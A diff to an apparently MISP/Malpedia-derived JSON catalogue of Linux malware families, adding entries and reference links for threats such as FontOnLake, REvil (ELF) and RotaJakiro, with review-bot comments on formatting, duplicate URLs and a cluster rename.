 "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/"
 ],
 "synonyms": [],
@@ -2707,11 +3242,25 @@
 "uuid": "ac30f2be-8153-4588-b29c-5e5863792930",
 "value": "floodor"
 },
+ {
+ "description": "This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.\r\n\r\nIt comes with a rootkit as well.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fontonlake",
+ "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c530d62b-e49f-4ccf-9c87-d9f6c16617b7",
+ "value": "FontOnLake"
+ },
 {
 "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
 ],
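Review bot: The FontOnLake description embeds `\r\n\r\n` to separate its two sentences, whereas every other description visible in this file (Bifrost, DDG, FritzFrog, HelloKitty, NiuB) is a single line with no control characters. Carriage returns are unusual in a UTF-8 JSON corpus and will surface as literal `\r` in consumers that only normalise `\n`; rewriting the value with a single space, `"… (e.g. by modifying sshd) and proxy usage. It comes with a rootkit as well."`, keeps the entry consistent with its neighbours. The FritzFrog object that follows starts inside this hunk but its `meta` continues past it.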
@@ -2773,6 +3322,19 @@
 "uuid": "6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3",
 "value": "GreedyAntd"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.habitsrat",
+ "https://twitter.com/michalmalik/status/1435918937162715139"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e87e7f26-f2a1-437f-8650-312050e3cd48",
+ "value": "HabitsRAT (ELF)"
+ },
 {
 "description": "",
 "meta": {
@@ -2848,6 +3410,22 @@
 "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d",
 "value": "Hand of Thief"
 },
+ {
+ "description": "Linux version of the HelloKitty ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
+ "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "785cadf7-5c99-40bc-b718-8a98d9aa90b7",
+ "value": "HelloKitty (ELF)"
+ },
 {
 "description": "",
 "meta": {
@@ -2885,6 +3463,19 @@
 "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
 "value": "Hide and Seek"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hubnr",
+ "https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c55389b0-e778-4cf9-9030-3d1efc1224c9",
+ "value": "Hubnr"
+ },
 {
 "description": "",
 "meta": {
@@ -2925,7 +3516,8 @@
 "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
 "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/"
+ "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf"
 ],
 "synonyms": [
 "InterPlanetary Storm"
@@ -2955,6 +3547,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji",
 "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/"
 ],
@@ -2971,6 +3564,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
 "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf",
 "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html",
+ "https://www.lacework.com/the-kek-security-network/",
 "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/"
 ],
 "synonyms": [
@@ -2998,6 +3592,19 @@
 "uuid": "e3787d95-2595-449e-8cf9-90845a9b7444",
 "value": "kerberods"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kfos",
+ "https://twitter.com/r3dbU7z/status/1378564694462586880"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5e353bc2-4d32-409b-aeb6-c7df32607c56",
+ "value": "kfos"
+ },
 {
 "description": "",
 "meta": {
@@ -3008,9 +3615,11 @@
 "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/",
 "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
 "https://twitter.com/IntezerLabs/status/1259818964848386048",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
 "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
- "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability"
+ "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability",
+ "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html"
 ],
 "synonyms": [
 "h2miner"
@@ -3020,12 +3629,26 @@
 "uuid": "ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea",
 "value": "Kinsing"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kivars",
+ "https://www.trendmicro.com/en_us/research/16/c/threat-actors-behind-shrouded-crossbow-creates-bifrose-for-unix.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8b24118-4ce8-471b-8683-1077a0f5f2a9",
+ "value": "KIVARS (ELF)"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos",
 "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf",
 "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/"
 ],
@@ -3227,27 +3850,41 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai",
- "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
 "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
 "http://osint.bambenekconsulting.com/feeds/",
- "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
- "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
- "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
- "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
 "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
+ "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/",
+ "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/",
- "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
- "https://isc.sans.edu/diary/22786",
- "https://github.com/jgamblin/Mirai-Source-Code",
- "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/",
- "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
 "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html",
 "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
+ "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
+ "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
+ "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
 "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
- "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet"
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
+ "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space",
+ "https://isc.sans.edu/diary/22786",
+ "https://github.com/jgamblin/Mirai-Source-Code",
+ "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/",
+ "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants",
+ "https://www.youtube.com/watch?v=KVJyYTie-Dc",
+ "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
+ "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
+ "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
+ "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
+ "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai",
+ "https://synthesis.to/2021/06/30/automating_string_decryption.html",
+ "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
+ "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/"
 ],
 "synonyms": [
 "Katana"
@@ -3270,13 +3907,27 @@
 "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
 "value": "Mokes (ELF)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.momentum",
+ "https://www.trendmicro.com/en_us/research/19/l/ddos-attacks-and-iot-exploits-new-activity-from-momentum-botnet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "aaf8ce1b-3117-47c6-b756-809538ac8ff2",
+ "value": "Momentum"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot",
 "https://blog.netlab.360.com/ddos-botnet-moobot-en/",
- "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/"
+ "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/",
+ "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b"
 ],
 "synonyms": [],
 "type": []
@@ -3305,9 +3956,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi",
+ "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet",
 "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/",
- "https://blog.netlab.360.com/mozi-another-botnet-using-dht/",
- "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/"
+ "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/",
+ "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/",
+ "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/",
+ "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/",
+ "https://blog.netlab.360.com/mozi-another-botnet-using-dht/"
 ],
 "synonyms": [],
 "type": []
@@ -3329,7 +3984,7 @@
 "value": "MrBlack"
 },
 {
- "description": "",
+ "description": "Ransomware used against Linux servers.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry",
@@ -3339,7 +3994,7 @@
 "type": []
 },
 "uuid": "7ec8a41f-c72e-4832-a5a4-9d7380cea083",
- "value": "Nextcry Ransomware"
+ "value": "Nextcry"
 },
 {
 "description": "",
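Review bot: The `@@ -3339,7 +3994,7 @@` hunk changes the Nextcry cluster's `value` from "Nextcry Ransomware" to "Nextcry" while keeping the uuid, but does not retain the old name anywhere. In MISP galaxies the tag string is derived from `value` (`misp-galaxy:malpedia="…"`), so events tagged with the old string will presumably stop resolving to this cluster after the rename. The cluster's `synonyms` array sits between the two hunks and is outside the visible lines; adding `"Nextcry Ransomware"` there would preserve the old tag as an alias at no cost.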
@@ -3356,6 +4011,20 @@
 "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242",
 "value": "Ngioweb (ELF)"
 },
+ {
+ "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.niub",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec",
+ "value": "NiuB"
+ },
 {
 "description": "FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.",
 "meta": {
@@ -3410,6 +4079,19 @@
 "uuid": "cc48c6ae-d274-4ad0-b013-bd75041a20c8",
 "value": "p0sT5n1F3r"
 },
+ {
+ "description": "P2P botnet derived from the Mirai source code.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot",
+ "https://www.cert.org.cn/publish/main/11/2021/20210628133948926376206/20210628133948926376206_.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7aff049d-9326-466d-bbcc-d62da673b32c",
+ "value": "pbot"
+ },
 {
 "description": "",
 "meta": {
@@ -3439,9 +4121,11 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot",
 "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf",
 "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf",
+ "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/",
 "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
 "https://twitter.com/Nocturnus/status/1308430959512092673",
+ "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/",
 "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/"
 ],
 "synonyms": [
@@ -3483,13 +4167,44 @@
 "uuid": "de3c14aa-f9f4-4071-8e6e-a2c16a3394ad",
 "value": "PLEAD (ELF)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prism",
+ "https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar"
+ ],
+ "synonyms": [
+ "waterdrop"
+ ],
+ "type": []
+ },
+ "uuid": "9a4a866b-84a9-4778-8de8-2780a27c0597",
+ "value": "PRISM"
+ },
+ {
+ "description": "Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.privet_sanya",
+ "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "41e5aafb-5847-421e-813d-627414ee31bb",
+ "value": "PrivetSanya"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei",
- "https://twitter.com/IntezerLabs/status/1338480158249013250",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
+ "https://cujo.com/iot-malware-journals-prometei-linux/",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://twitter.com/IntezerLabs/status/1338480158249013250",
 "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
@@ -3533,11 +4248,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt",
 "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
+ "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/",
 "https://www.anomali.com/blog/the-ech0raix-ransomware",
 "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/",
 "https://www.qnap.com/en/security-advisory/QSA-20-02",
 "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
+ "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/",
+ "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/",
 "https://www.ibm.com/downloads/cas/Z81AVOY7"
 ],
 "synonyms": [
@@ -3598,12 +4316,19 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx",
 "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
 "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195"
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
 ],
 "synonyms": [
 "Defray777"
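Review bot: The added `https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/` duplicates the existing entry for the same post that carries `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`, so the RansomEXX refs now list one article twice and a string-equality dedup will not catch it; keeping only the parameter-free form is the cleaner fix. The same tracking-parameter pattern recurs in other hunks of this diff — the `?s=20` tweet in REvil (ELF), the `ibm.com/downloads/cas/WMDZOWK6?social_post=…&linkId=…` link added to Tsunami, Xanthe and XOR DDoS, and `scotthelme.co.uk/…?utm_source=dlvr.it&utm_medium=twitter` in Magecart — and is best normalised once, ideally in whatever produces the list. The `docs.google.com/spreadsheets/d/…` ref is an unattributed, editable document that may not stay readable; the hunk already pairs the cisoclub.ru PDF with a web.archive.org copy, and the spreadsheet would benefit from the same treatment or a note of who maintains it.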
@@ -3672,6 +4397,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe",
 "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/",
 "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
 "https://vms.drweb.com/virus/?i=7754026&lng=en"
 ],
 "synonyms": [],
@@ -3693,6 +4419,37 @@
 "uuid": "934478a1-1243-4c26-8360-be3d01ae193e",
 "value": "reptile"
 },
+ {
+ "description": "ELF version of win.revil targeting VMware ESXi hypervisors.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5",
+ "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
+ "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://github.com/f0wl/REconfig-linux",
+ "https://www.youtube.com/watch?v=ptbNMlWxYnE",
+ "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://twitter.com/VK_Intel/status/1409601311092490248",
+ "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
+ "https://twitter.com/VK_Intel/status/1409601311092490248?s=20",
+ "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/",
+ "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/",
+ "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
+ "https://threatpost.com/ransomware-revil-sites-disappears/167745/"
+ ],
+ "synonyms": [
+ "REvix"
+ ],
+ "type": []
+ },
+ "uuid": "d9d76456-01a3-4dcd-afc2-87529e00c1ba",
+ "value": "REvil (ELF)"
+ },
 {
 "description": "",
 "meta": {
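Review bot: `https://twitter.com/VK_Intel/status/1409601311092490248` is listed twice in the new REvil (ELF) refs, once bare and once with a `?s=20` share parameter, so the list carries the same tweet under two strings; dropping the parameterised copy leaves a single entry. The description "ELF version of win.revil" leans on the Malpedia family id, which readers of the galaxy alone may not recognise as the Windows REvil cluster; spelling that out ("ELF version of the Windows REvil family, win.revil") keeps the entry self-contained.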
@@ -3733,11 +4490,27 @@
 "uuid": "e18bf514-b978-4bef-b4d9-834a5100fced",
 "value": "Roboto"
 },
+ {
+ "description": "RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021.\r\nThe malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro",
+ "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/",
+ "https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro",
+ "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "66fb7b48-60f2-44fc-9cbe-f70e776d058b",
+ "value": "RotaJakiro"
+ },
 {
 "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori",
+ "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/",
 "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
 "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
 "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
@@ -3897,6 +4670,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi",
 "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
 "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/"
 ],
 "synonyms": [],
@@ -3931,16 +4705,40 @@
 "uuid": "5c117b01-826b-4656-b6ca-8b18b6e6159f",
 "value": "sustes miner"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.suterusu",
+ "https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis/"
+ ],
+ "synonyms": [
+ "HCRootkit"
+ ],
+ "type": []
+ },
+ "uuid": "d2748a0c-8739-4006-95c4-bdf6350d7fa9",
+ "value": "Suterusu"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
 "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
- "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
- "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
+ "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
+ "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
+ "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
+ "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
